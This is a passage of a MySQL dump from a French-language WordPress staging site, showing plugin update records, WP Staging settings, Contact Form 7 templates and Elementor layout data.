analytics\";s:4:\"slug\";s:16:\"google-analytics\";s:5:\"count\";i:278;}s:12:\"notification\";a:3:{s:4:\"name\";s:12:\"notification\";s:4:\"slug\";s:12:\"notification\";s:5:\"count\";i:277;}}','no'),(2483,'_site_transient_timeout_theme_roots','1512723892','no'),(2484,'_site_transient_theme_roots','a:4:{s:6:\"magzma\";s:7:\"/themes\";s:13:\"twentyfifteen\";s:7:\"/themes\";s:15:\"twentyseventeen\";s:7:\"/themes\";s:13:\"twentysixteen\";s:7:\"/themes\";}','no'),(2486,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1512722684;s:7:\"checked\";a:13:{s:19:\"akismet/akismet.php\";s:5:\"3.3.4\";s:36:\"contact-form-7/wp-contact-form-7.php\";s:5:\"4.9.1\";s:47:\"easy-facebook-likebox/easy-facebook-likebox.php\";s:5:\"4.3.3\";s:53:\"easy-twitter-feed-widget/easy-twitter-feed-widget.php\";s:3:\"0.8\";s:23:\"elementor/elementor.php\";s:5:\"1.8.0\";s:53:\"facebook-like-box-widget/facebook-like-box-widget.php\";s:3:\"2.9\";s:50:\"google-analytics-for-wordpress/googleanalytics.php\";s:5:\"6.2.4\";s:9:\"hello.php\";s:3:\"1.6\";s:26:\"popup-by-supsystic/pps.php\";s:6:\"1.9.11\";s:35:\"redux-framework/redux-framework.php\";s:7:\"3.6.7.7\";s:27:\"trackserver/trackserver.php\";s:5:\"3.0.1\";s:25:\"wp-staging/wp-staging.php\";s:5:\"2.1.5\";s:24:\"wordpress-seo/wp-seo.php\";s:5:\"5.7.1\";}s:8:\"response\";a:6:{s:19:\"akismet/akismet.php\";O:8:\"stdClass\":11:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:5:\"4.0.1\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/plugin/akismet.4.0.1.zip\";s:5:\"icons\";a:3:{s:2:\"1x\";s:59:\"https://ps.w.org/akismet/assets/icon-128x128.png?rev=969272\";s:2:\"2x\";s:59:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=969272\";s:7:\"default\";s:59:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=969272\";}s:7:\"banners\";a:2:{s:2:\"1x\";s:61:\"https://ps.w.org/akismet/assets/banner-772x250.jpg?rev=479904\";s:7:\"default\";s:61:\"https://ps.w.org/akismet/assets/banner-772x250.jpg?rev=479904\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"4.9.1\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:47:\"easy-facebook-likebox/easy-facebook-likebox.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:35:\"w.org/plugins/easy-facebook-likebox\";s:4:\"slug\";s:21:\"easy-facebook-likebox\";s:6:\"plugin\";s:47:\"easy-facebook-likebox/easy-facebook-likebox.php\";s:11:\"new_version\";s:5:\"4.3.4\";s:3:\"url\";s:52:\"https://wordpress.org/plugins/easy-facebook-likebox/\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/plugin/easy-facebook-likebox.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:74:\"https://ps.w.org/easy-facebook-likebox/assets/icon-128x128.png?rev=1195342\";s:7:\"default\";s:74:\"https://ps.w.org/easy-facebook-likebox/assets/icon-128x128.png?rev=1195342\";}s:7:\"banners\";a:2:{s:2:\"1x\";s:76:\"https://ps.w.org/easy-facebook-likebox/assets/banner-772x250.jpg?rev=1192818\";s:7:\"default\";s:76:\"https://ps.w.org/easy-facebook-likebox/assets/banner-772x250.jpg?rev=1192818\";}s:11:\"banners_rtl\";a:0:{}s:14:\"upgrade_notice\";s:71:\"<p>Fixed FB not defined issue.\nTested upto WordPress 4.9.1 version.</p>\";s:6:\"tested\";s:5:\"4.9.1\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:23:\"elementor/elementor.php\";O:8:\"stdClass\":11:{s:2:\"id\";s:23:\"w.org/plugins/elementor\";s:4:\"slug\";s:9:\"elementor\";s:6:\"plugin\";s:23:\"elementor/elementor.php\";s:11:\"new_version\";s:5:\"1.8.9\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/elementor/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/elementor.1.8.9.zip\";s:5:\"icons\";a:4:{s:2:\"1x\";s:62:\"https://ps.w.org/elementor/assets/icon-128x128.png?rev=1427768\";s:2:\"2x\";s:62:\"https://ps.w.org/elementor/assets/icon-256x256.png?rev=1427768\";s:3:\"svg\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=1426809\";s:7:\"default\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=1426809\";}s:7:\"banners\";a:3:{s:2:\"2x\";s:65:\"https://ps.w.org/elementor/assets/banner-1544x500.png?rev=1475479\";s:2:\"1x\";s:64:\"https://ps.w.org/elementor/assets/banner-772x250.png?rev=1475479\";s:7:\"default\";s:65:\"https://ps.w.org/elementor/assets/banner-1544x500.png?rev=1475479\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"4.9.1\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:50:\"google-analytics-for-wordpress/googleanalytics.php\";O:8:\"stdClass\":11:{s:2:\"id\";s:44:\"w.org/plugins/google-analytics-for-wordpress\";s:4:\"slug\";s:30:\"google-analytics-for-wordpress\";s:6:\"plugin\";s:50:\"google-analytics-for-wordpress/googleanalytics.php\";s:11:\"new_version\";s:5:\"6.2.6\";s:3:\"url\";s:61:\"https://wordpress.org/plugins/google-analytics-for-wordpress/\";s:7:\"package\";s:79:\"https://downloads.wordpress.org/plugin/google-analytics-for-wordpress.6.2.6.zip\";s:5:\"icons\";a:4:{s:2:\"1x\";s:83:\"https://ps.w.org/google-analytics-for-wordpress/assets/icon-128x128.png?rev=1598927\";s:2:\"2x\";s:83:\"https://ps.w.org/google-analytics-for-wordpress/assets/icon-256x256.png?rev=1598927\";s:3:\"svg\";s:75:\"https://ps.w.org/google-analytics-for-wordpress/assets/icon.svg?rev=1598927\";s:7:\"default\";s:75:\"https://ps.w.org/google-analytics-for-wordpress/assets/icon.svg?rev=1598927\";}s:7:\"banners\";a:3:{s:2:\"2x\";s:86:\"https://ps.w.org/google-analytics-for-wordpress/assets/banner-1544x500.png?rev=1598927\";s:2:\"1x\";s:85:\"https://ps.w.org/google-analytics-for-wordpress/assets/banner-772x250.png?rev=1598927\";s:7:\"default\";s:86:\"https://ps.w.org/google-analytics-for-wordpress/assets/banner-1544x500.png?rev=1598927\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"4.9.0\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:26:\"popup-by-supsystic/pps.php\";O:8:\"stdClass\":11:{s:2:\"id\";s:32:\"w.org/plugins/popup-by-supsystic\";s:4:\"slug\";s:18:\"popup-by-supsystic\";s:6:\"plugin\";s:26:\"popup-by-supsystic/pps.php\";s:11:\"new_version\";s:6:\"1.9.14\";s:3:\"url\";s:49:\"https://wordpress.org/plugins/popup-by-supsystic/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/popup-by-supsystic.zip\";s:5:\"icons\";a:3:{s:2:\"1x\";s:71:\"https://ps.w.org/popup-by-supsystic/assets/icon-128x128.png?rev=1684295\";s:2:\"2x\";s:71:\"https://ps.w.org/popup-by-supsystic/assets/icon-256x256.png?rev=1684296\";s:7:\"default\";s:71:\"https://ps.w.org/popup-by-supsystic/assets/icon-256x256.png?rev=1684296\";}s:7:\"banners\";a:3:{s:2:\"2x\";s:74:\"https://ps.w.org/popup-by-supsystic/assets/banner-1544x500.png?rev=1684294\";s:2:\"1x\";s:73:\"https://ps.w.org/popup-by-supsystic/assets/banner-772x250.png?rev=1684293\";s:7:\"default\";s:74:\"https://ps.w.org/popup-by-supsystic/assets/banner-1544x500.png?rev=1684294\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"4.9.1\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:24:\"wordpress-seo/wp-seo.php\";O:8:\"stdClass\":11:{s:2:\"id\";s:27:\"w.org/plugins/wordpress-seo\";s:4:\"slug\";s:13:\"wordpress-seo\";s:6:\"plugin\";s:24:\"wordpress-seo/wp-seo.php\";s:11:\"new_version\";s:5:\"5.9.1\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/wordpress-seo/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/wordpress-seo.5.9.1.zip\";s:5:\"icons\";a:4:{s:2:\"1x\";s:66:\"https://ps.w.org/wordpress-seo/assets/icon-128x128.png?rev=1550389\";s:2:\"2x\";s:66:\"https://ps.w.org/wordpress-seo/assets/icon-256x256.png?rev=1550389\";s:3:\"svg\";s:58:\"https://ps.w.org/wordpress-seo/assets/icon.svg?rev=1203032\";s:7:\"default\";s:58:\"https://ps.w.org/wordpress-seo/assets/icon.svg?rev=1203032\";}s:7:\"banners\";a:3:{s:2:\"2x\";s:69:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500.png?rev=1695112\";s:2:\"1x\";s:68:\"https://ps.w.org/wordpress-seo/assets/banner-772x250.png?rev=1695112\";s:7:\"default\";s:69:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500.png?rev=1695112\";}s:11:\"banners_rtl\";a:3:{s:2:\"2x\";s:73:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500-rtl.png?rev=1695112\";s:2:\"1x\";s:72:\"https://ps.w.org/wordpress-seo/assets/banner-772x250-rtl.png?rev=1695112\";s:7:\"default\";s:73:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500-rtl.png?rev=1695112\";}s:6:\"tested\";s:5:\"4.9.1\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:7:{s:36:\"contact-form-7/wp-contact-form-7.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:28:\"w.org/plugins/contact-form-7\";s:4:\"slug\";s:14:\"contact-form-7\";s:6:\"plugin\";s:36:\"contact-form-7/wp-contact-form-7.php\";s:11:\"new_version\";s:5:\"4.9.1\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/contact-form-7/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/contact-form-7.4.9.1.zip\";s:5:\"icons\";a:3:{s:2:\"1x\";s:66:\"https://ps.w.org/contact-form-7/assets/icon-128x128.png?rev=984007\";s:2:\"2x\";s:66:\"https://ps.w.org/contact-form-7/assets/icon-256x256.png?rev=984007\";s:7:\"default\";s:66:\"https://ps.w.org/contact-form-7/assets/icon-256x256.png?rev=984007\";}s:7:\"banners\";a:3:{s:2:\"2x\";s:69:\"https://ps.w.org/contact-form-7/assets/banner-1544x500.png?rev=860901\";s:2:\"1x\";s:68:\"https://ps.w.org/contact-form-7/assets/banner-772x250.png?rev=880427\";s:7:\"default\";s:69:\"https://ps.w.org/contact-form-7/assets/banner-1544x500.png?rev=860901\";}s:11:\"banners_rtl\";a:0:{}}s:53:\"easy-twitter-feed-widget/easy-twitter-feed-widget.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:38:\"w.org/plugins/easy-twitter-feed-widget\";s:4:\"slug\";s:24:\"easy-twitter-feed-widget\";s:6:\"plugin\";s:53:\"easy-twitter-feed-widget/easy-twitter-feed-widget.php\";s:11:\"new_version\";s:3:\"0.8\";s:3:\"url\";s:55:\"https://wordpress.org/plugins/easy-twitter-feed-widget/\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/plugin/easy-twitter-feed-widget.0.8.zip\";s:5:\"icons\";a:3:{s:2:\"1x\";s:77:\"https://ps.w.org/easy-twitter-feed-widget/assets/icon-128x128.png?rev=1025015\";s:2:\"2x\";s:77:\"https://ps.w.org/easy-twitter-feed-widget/assets/icon-256x256.png?rev=1025015\";s:7:\"default\";s:77:\"https://ps.w.org/easy-twitter-feed-widget/assets/icon-256x256.png?rev=1025015\";}s:7:\"banners\";a:3:{s:2:\"2x\";s:80:\"https://ps.w.org/easy-twitter-feed-widget/assets/banner-1544x500.png?rev=1025015\";s:2:\"1x\";s:79:\"https://ps.w.org/easy-twitter-feed-widget/assets/banner-772x250.png?rev=1025015\";s:7:\"default\";s:80:\"https://ps.w.org/easy-twitter-feed-widget/assets/banner-1544x500.png?rev=1025015\";}s:11:\"banners_rtl\";a:0:{}}s:53:\"facebook-like-box-widget/facebook-like-box-widget.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:38:\"w.org/plugins/facebook-like-box-widget\";s:4:\"slug\";s:24:\"facebook-like-box-widget\";s:6:\"plugin\";s:53:\"facebook-like-box-widget/facebook-like-box-widget.php\";s:11:\"new_version\";s:3:\"2.9\";s:3:\"url\";s:55:\"https://wordpress.org/plugins/facebook-like-box-widget/\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/plugin/facebook-like-box-widget.zip\";s:5:\"icons\";a:0:{}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}}s:9:\"hello.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:25:\"w.org/plugins/hello-dolly\";s:4:\"slug\";s:11:\"hello-dolly\";s:6:\"plugin\";s:9:\"hello.php\";s:11:\"new_version\";s:3:\"1.6\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/hello-dolly/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/hello-dolly.1.6.zip\";s:5:\"icons\";a:3:{s:2:\"1x\";s:63:\"https://ps.w.org/hello-dolly/assets/icon-128x128.jpg?rev=969907\";s:2:\"2x\";s:63:\"https://ps.w.org/hello-dolly/assets/icon-256x256.jpg?rev=969907\";s:7:\"default\";s:63:\"https://ps.w.org/hello-dolly/assets/icon-256x256.jpg?rev=969907\";}s:7:\"banners\";a:2:{s:2:\"1x\";s:65:\"https://ps.w.org/hello-dolly/assets/banner-772x250.png?rev=478342\";s:7:\"default\";s:65:\"https://ps.w.org/hello-dolly/assets/banner-772x250.png?rev=478342\";}s:11:\"banners_rtl\";a:0:{}}s:35:\"redux-framework/redux-framework.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:29:\"w.org/plugins/redux-framework\";s:4:\"slug\";s:15:\"redux-framework\";s:6:\"plugin\";s:35:\"redux-framework/redux-framework.php\";s:11:\"new_version\";s:7:\"3.6.7.7\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/redux-framework/\";s:7:\"package\";s:66:\"https://downloads.wordpress.org/plugin/redux-framework.3.6.7.7.zip\";s:5:\"icons\";a:4:{s:2:\"1x\";s:67:\"https://ps.w.org/redux-framework/assets/icon-128x128.png?rev=995554\";s:2:\"2x\";s:67:\"https://ps.w.org/redux-framework/assets/icon-256x256.png?rev=995554\";s:3:\"svg\";s:59:\"https://ps.w.org/redux-framework/assets/icon.svg?rev=995554\";s:7:\"default\";s:59:\"https://ps.w.org/redux-framework/assets/icon.svg?rev=995554\";}s:7:\"banners\";a:2:{s:2:\"1x\";s:69:\"https://ps.w.org/redux-framework/assets/banner-772x250.png?rev=793165\";s:7:\"default\";s:69:\"https://ps.w.org/redux-framework/assets/banner-772x250.png?rev=793165\";}s:11:\"banners_rtl\";a:0:{}}s:27:\"trackserver/trackserver.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:25:\"w.org/plugins/trackserver\";s:4:\"slug\";s:11:\"trackserver\";s:6:\"plugin\";s:27:\"trackserver/trackserver.php\";s:11:\"new_version\";s:5:\"3.0.1\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/trackserver/\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/plugin/trackserver.zip\";s:5:\"icons\";a:0:{}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}}s:25:\"wp-staging/wp-staging.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:24:\"w.org/plugins/wp-staging\";s:4:\"slug\";s:10:\"wp-staging\";s:6:\"plugin\";s:25:\"wp-staging/wp-staging.php\";s:11:\"new_version\";s:5:\"2.1.5\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/wp-staging/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/wp-staging.2.1.5.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:63:\"https://ps.w.org/wp-staging/assets/icon-128x128.png?rev=1213317\";s:7:\"default\";s:63:\"https://ps.w.org/wp-staging/assets/icon-128x128.png?rev=1213317\";}s:7:\"banners\";a:2:{s:2:\"1x\";s:65:\"https://ps.w.org/wp-staging/assets/banner-772x250.png?rev=1223884\";s:7:\"default\";s:65:\"https://ps.w.org/wp-staging/assets/banner-772x250.png?rev=1223884\";}s:11:\"banners_rtl\";a:0:{}}}}','no'),(2487,'wpstg_installDate','2017-12-08 08:44:45','yes'),(2488,'wpstg_existing_clones_beta','a:0:{}','yes'),(2489,'wpstg_version','2.1.5','yes'),(2490,'wpstg_version_upgraded_from','','yes'),(2491,'wpstg_settings','a:4:{s:10:\"queryLimit\";s:4:\"1000\";s:9:\"fileLimit\";s:1:\"1\";s:9:\"batchSize\";s:1:\"2\";s:7:\"cpuLoad\";s:6:\"medium\";}','yes'),(2492,'wpstg_is_staging_site','true','yes'),(2493,'wpstg_rmpermalinks_executed','true','yes');
/*!40000 ALTER TABLE `wpstg0_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpstg0_postmeta`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpstg0_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=3145 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpstg0_postmeta`
--

LOCK TABLES `wpstg0_postmeta` WRITE;
/*!40000 ALTER TABLE `wpstg0_postmeta` DISABLE KEYS */;
INSERT INTO `wpstg0_postmeta` VALUES (1,2,'_wp_page_template','default'),(4,5,'_form','<label> Votre nom (obligatoire)\n    [text* your-name] </label>\n\n<label> Votre e-mail (obligatoire)\n    [email* your-email] </label>\n\n<label> Sujet\n    [text your-subject] </label>\n\n<label> Votre message\n    [textarea your-message] </label>\n\n[submit \"Envoyer\"]'),(5,5,'_mail','a:8:{s:7:\"subject\";s:31:\"Guinée innove \"[your-subject]\"\";s:6:\"sender\";s:50:\"[your-name] <admin@guineeinnove.nimbasolution.com>\";s:4:\"body\";s:210:\"De : [your-name] <[your-email]>\nSujet : [your-subject]\n\nCorps du message :\n[your-message]\n\n-- \nCet e-mail a été envoyé via le formulaire de contact de Guinée innove (https://guineeinnove.nimbasolution.com)\";s:9:\"recipient\";s:36:\"admin@guineeinnove.nimbasolution.com\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),(6,5,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:31:\"Guinée innove \"[your-subject]\"\";s:6:\"sender\";s:53:\"Guinée innove <admin@guineeinnove.nimbasolution.com>\";s:4:\"body\";s:154:\"Corps du message :\n[your-message]\n\n-- \nCet e-mail a été envoyé via le formulaire de contact de Guinée innove (https://guineeinnove.nimbasolution.com)\";s:9:\"recipient\";s:12:\"[your-email]\";s:18:\"additional_headers\";s:46:\"Reply-To: admin@guineeinnove.nimbasolution.com\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),(7,5,'_messages','a:8:{s:12:\"mail_sent_ok\";s:45:\"Merci pour votre message. Il a été envoyé.\";s:12:\"mail_sent_ng\";s:102:\"Une erreur s’est produite lors de l’envoi de votre message. Veuillez essayer à nouveau plus tard.\";s:16:\"validation_error\";s:88:\"Un ou plusieurs champs contiennent une erreur. Veuillez vérifier et essayer à nouveau.\";s:4:\"spam\";s:102:\"Une erreur s’est produite lors de l’envoi de votre message. Veuillez essayer à nouveau plus tard.\";s:12:\"accept_terms\";s:75:\"Vous devez accepter les termes et conditions avant d\'envoyer votre message.\";s:16:\"invalid_required\";s:25:\"Ce champ est obligatoire.\";s:16:\"invalid_too_long\";s:23:\"Le champ est trop long.\";s:17:\"invalid_too_short\";s:24:\"Le champ est trop court.\";}'),(8,5,'_additional_settings',NULL),(9,5,'_locale','fr_FR'),(475,357,'_elementor_template_type','page'),(476,357,'_elementor_edit_mode','builder'),(477,357,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"stretch_section\":\"\",\"layout\":\"boxed\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"height\":\"default\",\"custom_height\":{\"unit\":\"px\",\"size\":400},\"column_position\":\"middle\",\"content_position\":\"\",\"structure\":\"10\",\"sticky_element\":\"\",\"section_background\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_section\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_border\":\"\",\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"_section_responsive\":\"\",\"reverse_order_mobile\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_inline_size\":null,\"_column_size\":100,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"cp33sob\",\"elType\":\"widget\",\"settings\":{\"section_magzma_running_news_general_control\":\"\",\"posts_per_page\":\"6\",\"offset\":\"\",\"category\":[],\"orderby\":\"date\",\"metakey\":\"Views\",\"section_magzma_running_news_style_control\":\"\",\"running_wrap_bg\":\"#f2f2f7\",\"running_wrap_bord\":\"#e7e7e7\",\"arrow_color\":\"#ffffff\",\"arrow_bg\":\"#000000\",\"arrow_bg_hov\":\"#333333\",\"the_title\":\"Trending Now\",\"title_color\":\"#fff9f9\",\"title_bg_color\":\"#000000\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"title_font_weight\":\"600\",\"title_font_weight_tablet\":\"600\",\"title_font_weight_mobile\":\"600\",\"news_title_color\":\"#000000\",\"news_title_hov_color\":\"#aaaaaa\",\"news_title_font_size\":{\"unit\":\"px\",\"size\":16},\"news_title_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"news_title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"news_title_font_weight\":\"500\",\"news_title_font_weight_tablet\":\"500\",\"news_title_font_weight_mobile\":\"500\",\"section_magzma_carousel_options\":\"\",\"autoplay\":\"use\",\"autoplay_ms\":\"2500\",\"auto_loop\":\"use\",\"keyboard_nav\":\"\",\"effect_type\":\"slide\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"